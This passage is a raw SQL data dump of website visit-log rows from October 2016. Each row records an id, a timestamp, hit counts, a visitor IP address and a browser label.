589317,1,1,0,0,'91.196.177.94','chrome'),(65866,1475589475,1,1,0,0,'163.172.65.214','other'),(65867,1475589574,3,3,0,0,'130.193.50.34','other'),(65868,1475589657,1,1,0,0,'163.172.65.195','other'),(65869,1475589659,1,1,0,0,'94.179.53.221','chrome'),(65870,1475589749,1,1,0,0,'91.196.178.66','firefox'),(65871,1475589893,9,9,0,0,'141.8.183.25','other'),(65872,1475590137,2,2,0,0,'130.193.51.19','other'),(65873,1475590419,1,1,0,0,'91.196.178.68','firefox'),(65874,1475590478,1,1,0,0,'91.196.177.94','chrome'),(65875,1475590730,3,3,0,0,'141.8.142.58','other'),(65876,1475590776,5,5,0,0,'130.193.50.34','other'),(65877,1475591862,1,1,0,0,'163.172.65.17','other'),(65878,1475591977,1,1,0,0,'163.172.65.213','other'),(65879,1475591993,1,1,0,0,'91.196.177.94','chrome'),(65880,1475592007,1,1,0,0,'51.255.65.80','other'),(65881,1475592015,1,1,0,0,'51.255.65.69','other'),(65882,1475592542,1,1,0,0,'164.132.161.87','other'),(65883,1475592747,1,1,0,0,'51.255.65.65','other'),(65884,1475593062,1,1,0,0,'78.69.19.55','chrome'),(65885,1475593067,1,1,0,0,'78.69.19.55','other'),(65886,1475593190,1,1,0,0,'51.255.65.5','other'),(65887,1475593690,1,0,1,0,'66.249.75.187',''),(65888,1475593966,2,0,2,0,'66.249.76.46',''),(65889,1475594342,1,1,0,0,'91.196.177.15','chrome'),(65890,1475596742,1,1,0,0,'163.172.65.46','other'),(65891,1475597116,1,1,0,0,'207.46.13.2','other'),(65892,1475597505,1,0,1,0,'66.249.66.81',''),(65893,1475598083,1,1,0,0,'66.249.76.45','chrome'),(65894,1475598158,1,1,0,0,'51.255.65.70','other'),(65895,1475599757,3,3,0,0,'130.193.50.34','other'),(65896,1475599802,1,1,0,0,'130.193.51.19','other'),(65897,1475600037,1,1,0,0,'51.255.65.76','other'),(65898,1475600611,1,1,0,0,'163.172.65.53','other'),(65899,1475600950,1,1,0,0,'66.249.76.47','chrome'),(65900,1475601869,1,1,0,0,'51.255.65.82','other'),(65901,1475602004,1,1,0,0,'95.132.243.0','chrome'),(65902,1475602341,1,1,0,0,'91.196.178.71','chrome'),(65903,1475602468,2,2,0,0,'130.193.50.34','other'),(65904,1475602536,1,1,0,0,'164.132.161.27','other'),(65905,1475602854,1,1,0,0,'91.196.178.166','other'),(65906,1475603200,1,1,0,0,'163.172.64.243','other'),(65907,1475603538,2,2,0,0,'130.193.50.34','other'),(65908,1475603796,1,1,0,0,'91.196.178.37','other'),(65909,1475603832,1,1,0,0,'66.249.76.77','chrome'),(65910,1475603848,1,1,0,0,'164.132.161.18','other'),(65911,1475604203,1,1,0,0,'141.8.183.25','other'),(65912,1475604262,1,1,0,0,'207.46.13.2','other'),(65913,1475604590,1,1,0,0,'164.132.161.34','other'),(65914,1475604739,4,4,0,0,'130.193.50.34','other'),(65915,1475604826,1,1,0,0,'163.172.65.115','other'),(65916,1475605681,1,1,0,0,'130.193.50.34','other'),(65917,1475606117,1,1,0,0,'51.255.65.7','other'),(65918,1475606729,1,1,0,0,'51.255.65.34','other'),(65919,1475606813,1,0,1,0,'66.249.76.45',''),(65920,1475607492,1,1,0,0,'91.196.178.133','chrome'),(65921,1475608679,1,1,0,0,'164.132.161.35','other'),(65922,1475609010,1,0,1,0,'66.249.76.46',''),(65923,1475609671,1,1,0,0,'186.202.121.145','firefox'),(65924,1475610479,1,1,0,0,'163.172.66.28','other'),(65925,1475611224,1,1,0,0,'163.172.66.26','other'),(65926,1475611488,1,1,0,0,'141.0.15.215','other'),(65927,1475612002,1,0,1,0,'66.249.76.47',''),(65928,1475612303,1,1,0,0,'130.193.50.34','other'),(65929,1475612360,1,1,0,0,'164.132.161.77','other'),(65930,1475613026,1,0,1,0,'66.249.76.77',''),(65931,1475613118,1,1,0,0,'164.132.161.75','other'),(65932,1475614589,1,0,1,0,'66.249.76.81',''),(65933,1475614692,3,0,3,0,'66.249.76.77',''),(65934,1475614715,3,0,3,0,'66.249.76.79',''),(65935,1475614741,1,0,1,0,'66.249.66.177',''),(65936,1475614766,1,1,0,0,'66.249.66.87','chrome'),(65937,1475615633,1,0,1,0,'66.249.76.46',''),(65938,1475616653,1,1,0,0,'163.172.66.98','other'),(65939,1475617686,1,1,0,0,'163.172.65.241','other'),(65940,1475617842,1,0,1,0,'66.249.66.84',''),(65941,1475618191,1,1,0,0,'163.172.65.118','other'),(65942,1475618415,1,1,0,0,'66.249.76.46','chrome'),(65943,1475618806,1,1,0,0,'164.132.161.30','other'),(65944,1475619005,1,1,0,0,'130.193.50.34','other'),(65945,1475620994,203,203,0,0,'144.76.29.162','other'),(65946,1475621226,1,0,1,0,'66.249.76.77',''),(65947,1475621473,1,1,0,0,'163.172.65.42','other'),(65948,1475621904,1,0,1,0,'66.249.66.183',''),(65949,1475622088,1,1,0,0,'164.132.161.81','other'),(65950,1475622632,1,1,0,0,'207.46.13.83','other'),(65951,1475622785,1,0,1,0,'66.249.66.87',''),(65952,1475624171,1,1,0,0,'51.255.65.23','other'),(65953,1475625211,1,1,0,0,'51.255.65.84','other'),(65954,1475625335,1,1,0,0,'51.255.65.33','other'),(65955,1475626048,1,1,0,0,'163.172.66.35','other'),(65956,1475626107,1,1,0,0,'164.132.161.63','other'),(65957,1475626144,1,1,0,0,'163.172.65.250','other'),(65958,1475626370,1,1,0,0,'180.76.15.146','other'),(65959,1475626559,1,1,0,0,'51.255.65.31','other'),(65960,1475626583,1,1,0,0,'164.132.161.85','other'),(65961,1475626683,1,1,0,0,'163.172.66.126','other'),(65962,1475628167,1,1,0,0,'130.193.50.34','other'),(65963,1475628532,1,1,0,0,'164.132.161.28','other'),(65964,1475630462,1,1,0,0,'5.255.253.47','other'),(65965,1475630913,1,1,0,0,'163.172.65.8','other'),(65966,1475630970,1,1,0,0,'51.255.65.35','other'),(65967,1475631802,1,1,0,0,'163.172.66.152','other'),(65968,1475632273,1,1,0,0,'66.102.9.25','chrome'),(65969,1475632500,1,1,0,0,'163.172.66.17','other'),(65970,1475632874,1,1,0,0,'163.172.65.201','other'),(65971,1475633087,1,1,0,0,'51.255.65.51','other'),(65972,1475633788,1,1,0,0,'93.80.231.235','msie'),(65973,1475633889,4,4,0,0,'130.193.50.34','other'),(65974,1475634151,1,1,0,0,'141.8.183.25','other'),(65975,1475634191,1,1,0,0,'163.172.66.34','other'),(65976,1475634402,1,1,0,0,'163.172.66.89','other'),(65977,1475635285,1,1,0,0,'163.172.66.99','other'),(65978,1475635475,1,0,1,0,'68.180.229.114',''),(65979,1475636208,1,1,0,0,'163.172.64.253','other'),(65980,1475636773,1,1,0,0,'91.196.178.67','chrome'),(65981,1475636985,1,1,0,0,'51.255.65.85','other'),(65982,1475637044,2,2,0,0,'141.8.183.25','other'),(65983,1475637197,1,1,0,0,'163.172.66.86','other'),(65984,1475637734,1,1,0,0,'164.132.161.35','other'),(65985,1475638032,1,1,0,0,'207.46.13.166','other'),(65986,1475638169,1,1,0,0,'164.132.161.84','other'),(65987,1475638746,1,1,0,0,'164.132.161.22','other'),(65988,1475638752,1,1,0,0,'163.172.66.149','other'),(65989,1475638780,1,0,1,0,'66.249.76.45',''),(65990,1475639350,1,0,1,0,'66.249.66.180',''),(65991,1475641027,1,1,0,0,'51.255.65.23','other'),(65992,1475641270,1,1,0,0,'163.172.65.206','other'),(65993,1475641996,1,1,0,0,'51.255.65.31','other'),(65994,1475642229,4,4,0,0,'144.76.8.132','other'),(65995,1475642865,1,1,0,0,'163.172.65.58','other'),(65996,1475643522,1,1,0,0,'163.172.64.193','other'),(65997,1475643569,1,1,0,0,'163.172.66.60','other'),(65998,1475644107,1,1,0,0,'163.172.65.127','other'),(65999,1475644889,1,1,0,0,'164.132.161.13','other'),(66000,1475645085,1,1,0,0,'163.172.66.30','other'),(66001,1475645754,1,1,0,0,'94.179.51.222','firefox'),(66002,1475645795,1,1,0,0,'163.172.65.201','other'),(66003,1475646435,1,1,0,0,'163.172.66.165','other'),(66004,1475646851,1,1,0,0,'163.172.65.107','other'),(66005,1475647460,1,1,0,0,'163.172.65.242','other'),(66006,1475647899,1,1,0,0,'51.255.65.16','other'),(66007,1475649162,1,1,0,0,'91.196.178.67','firefox'),(66008,1475650960,1,0,1,0,'66.249.64.74',''),(66009,1475651598,1,1,0,0,'66.102.9.27','other'),(66010,1475651871,1,1,0,0,'91.196.178.66','chrome'),(66011,1475651942,1,1,0,0,'91.196.178.66','firefox'),(66012,1475652343,1,1,0,0,'180.76.15.9','other'),(66013,1475652933,1,1,0,0,'163.172.66.21','other'),(66014,1475652980,2,2,0,0,'195.49.151.197','firefox'),(66015,1475653190,1,1,0,0,'51.255.65.70','other'),(66016,1475653748,1,1,0,0,'164.132.161.86','other'),(66017,1475654083,1,1,0,0,'163.172.65.32','other'),(66018,1475654331,1,1,0,0,'178.92.249.12','firefox'),(66019,1475654394,1,1,0,0,'91.196.178.66','firefox'),(66020,1475654716,1,1,0,0,'164.132.161.28','other'),(66021,1475654788,1,1,0,0,'141.8.132.30','other'),(66022,1475655111,1,1,0,0,'51.255.65.62','other'),(66023,1475655200,1,1,0,0,'66.102.9.29','other'),(66024,1475655318,1,0,1,0,'66.249.64.74',''),(66025,1475655365,1,0,1,0,'68.180.229.114',''),(66026,1475656487,300,300,0,0,'51.254.32.77','other'),(66027,1475656532,1,1,0,0,'163.172.65.43','other'),(66028,1475658907,1,1,0,0,'66.102.9.29','other'),(66029,1475659759,1,1,0,0,'164.132.161.51','other'),(66030,1475660386,1,1,0,0,'91.196.178.66','firefox'),(66031,1475660621,1,1,0,0,'163.172.65.218','other'),(66032,1475660653,1,1,0,0,'176.36.38.5','chrome'),(66033,1475661066,1,1,0,0,'66.249.64.24','chrome'),(66034,1475661365,1,1,0,0,'163.172.65.38','other'),(66035,1475661534,1,1,0,0,'109.95.47.215','chrome'),(66036,1475661807,1,1,0,0,'164.132.161.10','other'),(66037,1475661931,1,1,0,0,'66.102.9.29','other'),(66038,1475662171,1,0,1,0,'66.249.64.27',''),(66039,1475662281,1,1,0,0,'51.255.65.34','other'),(66040,1475662597,1,1,0,0,'91.196.178.66','chrome'),(66041,1475662612,1,1,0,0,'163.172.66.139','other'),(66042,1475662734,1,0,1,0,'66.249.64.69',''),(66043,1475664272,1,1,0,0,'178.214.193.202','other'),(66044,1475664449,1,1,0,0,'91.196.178.70','chrome'),(66045,1475664474,1,1,0,0,'91.196.178.66','chrome'),(66046,1475665115,1,1,0,0,'66.249.64.74','chrome'),(66047,1475666009,1,1,0,0,'66.102.9.27','other'),(66048,1475667474,1,1,0,0,'91.196.178.70','firefox'),(66049,1475668798,1,1,0,0,'176.111.33.18','firefox'),(66050,1475669642,1,1,0,0,'66.102.9.25','other'),(66051,1475669868,1,0,1,0,'66.249.64.27',''),(66052,1475669971,1,1,0,0,'212.92.225.168','chrome'),(66053,1475671774,1,1,0,0,'46.211.250.113','chrome'),(66054,1475672397,1,1,0,0,'91.196.178.66','firefox'),(66055,1475672595,1,1,0,0,'51.255.65.95','other'),(66056,1475672687,1,1,0,0,'51.255.65.29','other'),(66057,1475672828,1,1,0,0,'164.132.161.72','other'),(66058,1475673691,1,1,0,0,'66.102.9.25','other'),(66059,1475674542,1,1,0,0,'91.196.178.66','chrome'),(66060,1475675094,1,1,0,0,'51.255.65.29','other'),(66061,1475675218,1,1,0,0,'94.179.78.106','chrome'),(66062,1475675430,1,1,0,0,'37.53.122.15','chrome'),(66063,1475675730,1,1,0,0,'164.132.161.77','other'),(66064,1475675842,1,1,0,0,'164.132.161.82','other'),(66065,1475675848,1,1,0,0,'94.179.0.109','firefox'),(66066,1475675948,1,1,0,0,'91.196.178.66','msie'),(66067,1475676027,1,1,0,0,'163.172.65.219','other'),(66068,1475676155,1,1,0,0,'163.172.65.112','other'),(66069,1475676645,1,1,0,0,'5.255.250.41','other'),(66070,1475676911,1,1,0,0,'164.132.161.43','other'),(66071,1475676938,1,1,0,0,'37.52.22.53','chrome'),(66072,1475676993,1,1,0,0,'66.102.9.27','other'),(66073,1475677031,1,1,0,0,'180.76.15.8','other'),(66074,1475678512,1,1,0,0,'31.148.255.20','firefox'),(66075,1475679439,1,1,0,0,'180.76.15.20','other'),(66076,1475679674,1,1,0,0,'91.196.178.66','firefox'),(66077,1475680453,1,1,0,0,'66.102.9.25','other'),(66078,1475680663,2,2,0,0,'108.59.8.80','other'),(66079,1475681049,1,1,0,0,'180.76.15.139','other'),(66080,1475681448,1,1,0,0,'180.76.15.144','other'),(66081,1475682903,1,0,1,0,'66.249.76.45',''),(66082,1475683370,1,1,0,0,'66.102.9.29','chrome'),(66083,1475684028,1,1,0,0,'66.102.9.27','other'),(66084,1475684600,1,1,0,0,'46.201.134.216','chrome'),(66085,1475685505,1,0,1,0,'68.180.229.114',''),(66086,1475685996,1,1,0,0,'163.172.64.234','other'),(66087,1475686173,1,1,0,0,'51.255.65.65','other'),(66088,1475686288,1,1,0,0,'163.172.64.247','other'),(66089,1475686473,1,1,0,0,'178.137.87.242','firefox'),(66090,1475687098,1,1,0,0,'66.102.9.29','other'),(66091,1475687328,1,1,0,0,'51.255.65.38','other'),(66092,1475689340,1,1,0,0,'163.172.65.110','other'),(66093,1475689770,1,1,0,0,'163.172.66.93','other'),(66094,1475690914,1,1,0,0,'66.102.9.25','other'),(66095,1475691174,2,2,0,0,'163.172.65.30','other'),(66096,1475691526,1,0,1,0,'66.249.69.69',''),(66097,1475692127,1,1,0,0,'51.255.65.19','other'),(66098,1475692537,1,0,1,0,'68.180.229.114',''),(66099,1475693010,1,1,0,0,'51.255.65.21','other'),(66100,1475693204,1,1,0,0,'163.172.64.229','other'),(66101,1475693945,1,1,0,0,'163.172.64.241','other'),(66102,1475694036,1,0,1,0,'66.249.69.79',''),(66103,1475694190,1,1,0,0,'164.132.161.7','other'),(66104,1475694479,1,1,0,0,'164.132.161.19','other'),(66105,1475694886,1,1,0,0,'141.0.13.47','other'),(66106,1475695022,3,3,0,0,'130.193.50.34','other'),(66107,1475695225,1,1,0,0,'66.249.76.45','chrome'),(66108,1475695454,1,1,0,0,'163.172.66.155','other'),(66109,1475695539,1,1,0,0,'66.249.75.187','chrome'),(66110,1475695827,1,0,1,0,'66.249.69.69',''),(66111,1475695924,1,1,0,0,'66.102.9.27','other'),(66112,1475697114,1,1,0,0,'51.255.65.78','other'),(66113,1475697222,1,1,0,0,'163.172.66.184','other'),(66114,1475698536,1,1,0,0,'163.172.66.8','other'),(66115,1475699282,1,1,0,0,'164.132.161.44','other'),(66116,1475699497,1,1,0,0,'163.172.66.108','other'),(66117,1475700738,1,1,0,0,'163.172.65.42','other'),(66118,1475700941,1,1,0,0,'163.172.65.229','other'),(66119,1475701064,1,1,0,0,'51.255.65.84','other'),(66120,1475701198,1,0,1,0,'66.249.76.79',''),(66121,1475702391,1,0,1,0,'66.249.76.81',''),(66122,1475704868,1,1,0,0,'207.46.13.2','other'),(66123,1475705622,1,1,0,0,'51.255.65.89','other'),(66124,1475705785,1,1,0,0,'207.46.13.166','other'),(66125,1475705824,1,1,0,0,'130.193.50.34','other'),(66126,1475705939,1,1,0,0,'157.55.39.147','other'),(66127,1475706316,1,1,0,0,'164.132.161.35','other'),(66128,1475707127,1,0,1,0,'66.249.76.45',''),(66129,1475708134,1,1,0,0,'163.172.66.31','other'),(66130,1475708983,1,1,0,0,'163.172.65.65','other'),(66131,1475709023,1,1,0,0,'163.172.66.100','other'),(66132,1475709109,1,1,0,0,'163.172.66.37','other'),(66133,1475709324,1,1,0,0,'163.172.65.56','other'),(66134,1475710159,1,1,0,0,'163.172.65.112','other'),(66135,1475710901,1,1,0,0,'163.172.65.111','other'),(66136,1475711269,1,1,0,0,'51.255.65.90','other'),(66137,1475711303,1,1,0,0,'163.172.64.248','other'),(66138,1475711519,1,1,0,0,'163.172.65.18','other'),(66139,1475711666,1,0,1,0,'66.249.76.45',''),(66140,1475711816,1,1,0,0,'163.172.64.232','other'),(66141,1475712530,1,1,0,0,'163.172.66.14','other'),(66142,1475713028,1,1,0,0,'130.193.50.34','other'),(66143,1475713222,1,1,0,0,'51.255.65.40','other'),(66144,1475714102,1,1,0,0,'130.193.50.34','other'),(66145,1475714272,1,1,0,0,'51.255.66.143','other'),(66146,1475715139,1,1,0,0,'163.172.66.97','other'),(66147,1475717230,1,1,0,0,'66.249.75.187','chrome'),(66148,1475718362,1,1,0,0,'207.46.13.166','other'),(66149,1475718800,1,1,0,0,'51.255.65.61','other'),(66150,1475719347,1,1,0,0,'51.255.65.2','other'),(66151,1475719876,1,1,0,0,'163.172.66.110','other'),(66152,1475720389,1,1,0,0,'164.132.161.85','other'),(66153,1475720427,1,1,0,0,'51.255.65.8','other'),(66154,1475720897,1,1,0,0,'164.132.161.30','other'),(66155,1475720924,1,1,0,0,'54.210.124.32','other'),(66156,1475722228,1,1,0,0,'163.172.65.116','other'),(66157,1475722909,1,1,0,0,'51.255.65.23','other'),(66158,1475723632,1,1,0,0,'164.132.161.2','other'),(66159,1475723807,1,1,0,0,'66.102.9.29','other'),(66160,1475724166,1,1,0,0,'163.172.66.23','other'),(66161,1475724260,1,1,0,0,'51.255.65.21','other'),(66162,1475724848,1,1,0,0,'51.255.65.67','other'),(66163,1475724948,1,1,0,0,'163.172.66.16','other'),(66164,1475725251,1,1,0,0,'164.132.161.7','other'),(66165,1475726095,1,1,0,0,'164.132.161.49','other'),(66166,1475726870,1,0,1,0,'66.249.76.47',''),(66167,1475728520,1,1,0,0,'164.132.161.68','other'),(66168,1475728871,1,1,0,0,'163.172.66.160','other'),(66169,1475729418,1,1,0,0,'91.196.178.70','chrome'),(66170,1475729449,1,1,0,0,'91.196.178.68','firefox'),(66171,1475729609,1,1,0,0,'66.102.9.25','chrome'),(66172,1475729794,1,1,0,0,'163.172.65.215','other'),(66173,1475730164,1,1,0,0,'207.46.13.166','other'),(66174,1475730767,1,1,0,0,'163.172.64.224','other'),(66175,1475731394,1,1,0,0,'212.92.225.168','chrome'),(66176,1475731570,1,1,0,0,'91.196.178.66','chrome'),(66177,1475731696,1,1,0,0,'94.179.0.109','firefox'),(66178,1475732328,1,1,0,0,'163.172.65.66','other'),(66179,1475732485,1,1,0,0,'163.172.65.55','other'),(66180,1475732624,1,1,0,0,'51.255.65.71','other'),(66181,1475732663,102,102,0,0,'62.210.148.247','other'),(66182,1475733098,1,1,0,0,'163.172.64.224','other'),(66183,1475733207,1,1,0,0,'163.172.65.219','other'),(66184,1475733465,1,1,0,0,'163.172.66.12','other'),(66185,1475733725,9,9,0,0,'174.34.135.242','other'),(66186,1475733885,1,1,0,0,'212.92.225.168','chrome'),(66187,1475734467,1,1,0,0,'51.255.65.43','other'),(66188,1475735089,1,1,0,0,'37.53.111.238','firefox'),(66189,1475736790,1,1,0,0,'51.255.65.91','other'),(66190,1475737621,1,1,0,0,'95.133.52.63','firefox'),(66191,1475737869,1,1,0,0,'66.249.75.187','chrome'),(66192,1475740661,1,1,0,0,'163.172.66.117','other'),(66193,1475741300,10,10,0,0,'69.30.234.2','other'),(66194,1475741585,1,1,0,0,'163.172.66.116','other'),(66195,1475742223,1,1,0,0,'193.218.117.62','firefox'),(66196,1475742367,1,1,0,0,'51.255.65.53','other'),(66197,1475742428,1,1,0,0,'91.196.178.66','firefox'),(66198,1475742514,1,1,0,0,'164.132.161.57','other'),(66199,1475743849,1,0,1,0,'66.249.76.46',''),(66200,1475744039,1,1,0,0,'91.196.178.129','chrome'),(66201,1475744279,1,1,0,0,'91.196.177.15','chrome'),(66202,1475744484,1,1,0,0,'163.172.65.210','other'),(66203,1475744553,1,1,0,0,'164.132.161.57','other'),(66204,1475744911,1,1,0,0,'163.172.66.56','other'),(66205,1475745787,1,0,1,0,'66.249.76.46',''),(66206,1475745921,1,1,0,0,'91.196.178.66','firefox'),(66207,1475746145,1,1,0,0,'163.172.66.28','other'),(66208,1475746639,1,0,1,0,'66.249.75.187',''),(66209,1475746694,1,0,1,0,'66.249.76.47',''),(66210,1475746883,1,1,0,0,'163.172.65.29','other'),(66211,1475747497,1,1,0,0,'51.255.65.76','other'),(66212,1475747583,1,1,0,0,'66.249.93.15','chrome'),(66213,1475747798,1,1,0,0,'51.255.65.39','other'),(66214,1475747841,1,0,1,0,'66.249.76.47',''),(66215,1475747868,1,1,0,0,'93.178.223.237','chrome'),(66216,1475747895,1,1,0,0,'164.132.161.30','other'),(66217,1475747912,1,1,0,0,'163.172.65.44','other'),(66218,1475748314,1,1,0,0,'164.132.161.3','other'),(66219,1475749711,1,1,0,0,'91.196.178.72','firefox'),(66220,1475749761,1,1,0,0,'212.92.225.168','chrome'),(66221,1475750415,1,1,0,0,'91.196.178.169','firefox'),(66222,1475751047,1,1,0,0,'94.179.90.164','firefox'),(66223,1475751882,1,1,0,0,'94.178.147.60','chrome'),(66224,1475752291,1,0,1,0,'66.249.76.81',''),(66225,1475752761,1,1,0,0,'91.196.178.101','chrome'),(66226,1475753291,4,4,0,0,'5.9.88.103','other'),(66227,1475753552,1,1,0,0,'93.170.4.9','chrome'),(66228,1475753639,1,1,0,0,'95.135.213.103','chrome'),(66229,1475753715,1,1,0,0,'176.193.102.209','chrome'),(66230,1475754325,1,1,0,0,'163.172.66.115','other'),(66231,1475754722,1,1,0,0,'212.92.225.168','chrome'),(66232,1475755275,1,0,1,0,'66.249.76.45',''),(66233,1475755297,1,1,0,0,'164.132.161.20','other'),(66234,1475755768,1,1,0,0,'51.255.65.56','other'),(66235,1475755867,1,0,1,0,'66.249.76.46',''),(66236,1475755881,1,1,0,0,'66.102.9.27','other'),(66237,1475757207,1,1,0,0,'37.54.106.45','chrome'),(66238,1475757454,1,1,0,0,'163.172.66.64','other'),(66239,1475757732,1,1,0,0,'51.255.65.59','other'),(66240,1475757916,1,1,0,0,'163.172.64.231','other'),(66241,1475758349,1,0,1,0,'66.249.76.79',''),(66242,1475758519,1,1,0,0,'212.92.225.168','chrome'),(66243,1475758743,1,0,1,0,'66.249.75.183',''),(66244,1475758827,2,0,2,0,'66.249.76.45',''),(66245,1475758832,1,0,1,0,'66.249.76.46',''),(66246,1475758917,1,1,0,0,'163.172.65.239','other'),(66247,1475759159,1,1,0,0,'66.102.9.25','other'),(66248,1475759664,1,0,1,0,'66.249.76.79',''),(66249,1475759708,1,0,1,0,'66.249.76.47',''),(66250,1475759889,1,1,0,0,'164.132.161.62','other'),(66251,1475760016,1,1,0,0,'91.196.178.167','firefox'),(66252,1475760041,1,1,0,0,'91.196.178.65','firefox'),(66253,1475760146,1,1,0,0,'91.196.178.67','chrome'),(66254,1475760452,2,0,2,0,'66.249.76.46',''),(66255,1475760591,1,1,0,0,'178.95.87.54','chrome'),(66256,1475760792,1,1,0,0,'163.172.66.169','other'),(66257,1475761504,1,0,1,0,'66.249.75.183',''),(66258,1475761705,1,1,0,0,'130.180.217.211','chrome'),(66259,1475761816,1,1,0,0,'163.172.65.116','other'),(66260,1475762579,1,1,0,0,'163.172.64.236','other'),(66261,1475762696,1,1,0,0,'66.102.9.27','other'),(66262,1475762838,1,1,0,0,'164.132.161.15','other'),(66263,1475763330,1,0,1,0,'66.249.75.179',''),(66264,1475764719,1,1,0,0,'51.255.65.48','other'),(66265,1475764888,1,0,1,0,'66.249.76.47',''),(66266,1475764894,1,1,0,0,'164.132.161.32','other'),(66267,1475764962,1,1,0,0,'163.172.66.168','other'),(66268,1475764964,1,0,1,0,'66.249.76.45',''),(66269,1475765005,2,2,0,0,'91.194.84.106','other'),(66270,1475765040,1,1,0,0,'163.172.65.50','other'),(66271,1475765702,1,1,0,0,'163.172.66.61','other'),(66272,1475766135,1,1,0,0,'94.179.124.151','chrome'),(66273,1475766142,1,1,0,0,'164.132.161.19','other'),(66274,1475766294,1,1,0,0,'66.102.9.29','other'),(66275,1475766759,1,1,0,0,'163.172.64.241','other'),(66276,1475766920,1,1,0,0,'163.172.65.5','other'),(66277,1475766950,1,0,1,0,'66.249.76.45',''),(66278,1475767102,1,1,0,0,'163.172.66.19','other'),(66279,1475767342,1,0,1,0,'66.249.69.69',''),(66280,1475767698,1,1,0,0,'51.255.65.37','other'),(66281,1475767809,1,0,1,0,'66.249.75.183',''),(66282,1475768086,1,0,1,0,'66.249.76.45',''),(66283,1475768444,1,0,1,0,'66.249.75.179',''),(66284,1475768449,1,1,0,0,'164.132.161.30','other'),(66285,1475768507,1,1,0,0,'51.255.65.5','other'),(66286,1475768556,1,1,0,0,'91.196.178.38','firefox'),(66287,1475768628,1,1,0,0,'163.172.64.253','other'),(66288,1475768785,1,1,0,0,'51.255.65.80','other'),(66289,1475768796,1,1,0,0,'37.53.111.238','firefox'),(66290,1475769802,1,1,0,0,'163.172.65.196','other'),(66291,1475769900,1,1,0,0,'66.102.9.27','other'),(66292,1475770808,2,0,2,0,'66.249.75.179',''),(66293,1475771485,1,0,1,0,'66.249.75.183',''),(66294,1475771520,1,1,0,0,'94.179.66.22','chrome'),(66295,1475772158,1,1,0,0,'130.193.50.34','other'),(66296,1475772305,1,1,0,0,'163.172.66.181','other'),(66297,1475772336,1,0,1,0,'66.249.76.47',''),(66298,1475772371,1,1,0,0,'51.255.65.42','other'),(66299,1475772689,1,0,1,0,'66.249.76.45',''),(66300,1475772988,1,1,0,0,'163.172.66.73','other'),(66301,1475773093,1,1,0,0,'91.196.178.40','chrome'),(66302,1475773147,1,1,0,0,'5.255.250.41','other'),(66303,1475773411,1,1,0,0,'51.255.65.24','other'),(66304,1475773492,1,1,0,0,'66.102.9.29','other'),(66305,1475773639,1,1,0,0,'164.132.161.45','other'),(66306,1475773740,1,1,0,0,'130.180.211.107','chrome'),(66307,1475773828,1,1,0,0,'163.172.65.16','other'),(66308,1475774506,1,0,1,0,'68.180.229.114',''),(66309,1475774679,1,1,0,0,'163.172.66.124','other'),(66310,1475775045,1,1,0,0,'164.132.161.30','other'),(66311,1475775127,1,1,0,0,'51.255.65.42','other'),(66312,1475776040,1,1,0,0,'178.255.215.94','other'),(66313,1475776288,1,1,0,0,'163.172.66.127','other'),(66314,1475776816,1,0,1,0,'66.249.75.187',''),(66315,1475776938,1,1,0,0,'130.193.50.34','other'),(66316,1475777060,1,0,1,0,'66.249.76.46',''),(66317,1475777092,1,1,0,0,'66.102.9.29','other'),(66318,1475777157,1,1,0,0,'64.62.210.39','chrome'),(66319,1475777373,1,0,1,0,'66.249.75.183',''),(66320,1475778008,1,1,0,0,'163.172.65.24','other'),(66321,1475778179,1,1,0,0,'91.196.178.136','chrome'),(66322,1475778187,14,14,0,0,'95.213.141.126','opera'),(66323,1475778192,2,2,0,0,'95.213.141.124','opera'),(66324,1475778913,1,1,0,0,'163.172.64.237','other'),(66325,1475779410,1,1,0,0,'163.172.66.49','other'),(66326,1475779909,1,1,0,0,'164.132.161.50','other'),(66327,1475780285,1,1,0,0,'51.255.65.89','other'),(66328,1475780307,1,1,0,0,'190.128.42.251','firefox'),(66329,1475780700,1,1,0,0,'66.102.9.29','other'),(66330,1475780813,1,1,0,0,'163.172.65.64','other'),(66331,1475780871,1,1,0,0,'163.172.66.113','other'),(66332,1475781166,1,0,1,0,'66.249.75.183',''),(66333,1475781339,1,1,0,0,'164.132.161.97','other'),(66334,1475781350,1,1,0,0,'51.255.65.53','other'),(66335,1475781890,1,0,1,0,'66.249.75.179',''),(66336,1475781910,1,0,1,0,'66.249.76.45',''),(66337,1475782238,1,1,0,0,'178.93.150.85','chrome'),(66338,1475783158,1,0,1,0,'66.249.69.152',''),(66339,1475783238,1,1,0,0,'51.255.65.85','other'),(66340,1475783251,2,2,0,0,'95.213.141.126','opera'),(66341,1475783767,1,1,0,0,'141.8.183.25','other'),(66342,1475783815,2,2,0,0,'130.193.50.34','other'),(66343,1475784302,1,1,0,0,'66.102.9.25','other'),(66344,1475785163,1,1,0,0,'164.132.161.96','other'),(66345,1475785269,1,0,1,0,'66.249.76.79',''),(66346,1475785409,1,1,0,0,'164.132.161.43','other'),(66347,1475785788,1,0,1,0,'66.249.76.47',''),(66348,1475786004,1,1,0,0,'164.132.161.33','other'),(66349,1475786529,1,0,1,0,'66.249.76.45',''),(66350,1475786921,1,0,1,0,'66.249.75.179',''),(66351,1475787342,1,1,0,0,'163.172.65.230','other'),(66352,1475787955,1,1,0,0,'66.102.9.25','other'),(66353,1475787996,1,1,0,0,'163.172.65.126','other'),(66354,1475788628,1,1,0,0,'163.172.66.93','other'),(66355,1475788917,1,1,0,0,'5.255.250.41','other'),(66356,1475788983,1,0,1,0,'66.249.76.47',''),(66357,1475789376,1,1,0,0,'163.172.65.240','other'),(66358,1475790240,1,1,0,0,'51.255.65.64','other'),(66359,1475790846,1,1,0,0,'164.132.161.81','other'),(66360,1475791473,1,1,0,0,'51.255.65.37','other'),(66361,1475791548,1,1,0,0,'51.255.65.96','other'),(66362,1475791738,1,1,0,0,'66.102.9.27','other'),(66363,1475792629,1,0,1,0,'66.249.76.47',''),(66364,1475792705,1,1,0,0,'163.172.65.36','other'),(66365,1475792809,1,0,1,0,'66.249.76.45',''),(66366,1475792928,1,1,0,0,'91.196.178.100','chrome'),(66367,1475793335,1,1,0,0,'51.255.65.51','other'),(66368,1475794097,5,5,0,0,'141.8.183.25','other'),(66369,1475794098,1,1,0,0,'163.172.64.179','other'),(66370,1475794159,5,5,0,0,'130.193.50.34','other'),(66371,1475794197,4,4,0,0,'130.193.51.19','other'),(66372,1475794387,1,0,1,0,'66.249.76.47',''),(66373,1475794559,1,1,0,0,'141.8.142.67','other'),(66374,1475794567,1,1,0,0,'93.158.152.84','other'),(66375,1475794574,1,1,0,0,'130.193.50.6','other'),(66376,1475794652,1,1,0,0,'164.132.161.95','other'),(66377,1475795272,1,0,1,0,'66.249.76.77',''),(66378,1475795386,1,